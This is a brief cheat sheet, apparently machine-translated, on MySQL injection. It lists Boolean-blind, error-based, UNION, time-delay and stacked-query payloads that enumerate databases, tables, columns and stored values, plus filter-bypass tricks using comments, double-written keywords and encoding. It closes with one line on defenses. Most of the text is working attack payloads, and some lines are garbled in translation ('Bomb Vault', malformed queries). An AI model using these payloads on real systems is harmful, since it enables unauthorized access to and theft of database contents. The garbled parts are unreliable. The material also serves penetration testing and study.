1, MySQL injection principle: The user input content is treated as a SQL statement to execute
2, MySQL injection combat experience: A test parameters, two test type, three test bypass
A test parameter: any injection parameter, it is necessary to determine the type (number or character), here refers to the type of injection parameters (* * *)
Commonly used test characters: quotation marks (single and double), parentheses, quotation marks and parentheses ...
Two test types: five major categories (Beust): Boolean blind, error injection, Union Joint query injection, time delay type blind, heap query injection
Boolean blind Note: and1=1, and 1=2, or 1=1, or 1=2 ...
Error type injection:
Floor:and (select 1 from (SELECT COUNT (*), concat (Database (), Floor (rand (0)) × from Information_schema.tables Group by X A
Updatexml:and 1=updatexml (1,concat (0x7e, (select Database ())), 1)
Extractvalue:and 1=extractvalue (1,concat (0x7e, (select Database ()))
......
Union union query Type injection:
ORDER BY N//fixed field, n is a positive integer
Union SELECT ... Look back, try to get the statement before union (@@@&&****) without echoing
Back to digits, table, field, value, second bit back to digits example, common commands are as follows:
Union Select 1,group_concat (schema_name), 3 from Information_schema.schemata//Bomb Vault
Union SELECT 1,GROUP_CONCAT (TABLE_NAME), 3 from Information_schema.tables where table_schema=database ()//Explode table
Union Select 1,group_concat (column_name), 3 from information_schema.columns where table_name= ' table name '//Explode field
Union Select 1,group_concat (Field 1,0x3a, Field 2), 3 from table name//burst value, 0x3a is used to separate fields, so we can view
Time-Delayed injection: Based on page response delay, test parameters: and sleep (5)
Injection method (guess solution):
And if (Length (Database ()) > ' 5 ', sleep (5), 0)//guess the length of the library name
And if (Ord (Database (), >100,sleep)) (5), 0)//guess the first character of the library name
...... It's better to use sqlmap here.
Heap Query injection: execute multiple SQL statements at the same time, you can perform additions and deletions to change the statement, separate statements separated by semicolons
Three try to bypass: is to keep trying, simply say a few
Bypass space: +,/**/, double space, carriage return newline (%0a,%a0), wide byte (%DF), parentheses
Bypass Union,select and other keywords: case, double write (uniounionn,unionunion), inline comment (/*!union*/), encode
Bypass and, or:&&,| |,%26%26, case, double write keywords (anandd,andand), encoding
......
3, MySQL Injection defense method: Black and white list strictly filter user input content; use parameterized queries; Use SQL to inject security devices
MySQL injection basics and Bypass Tips summary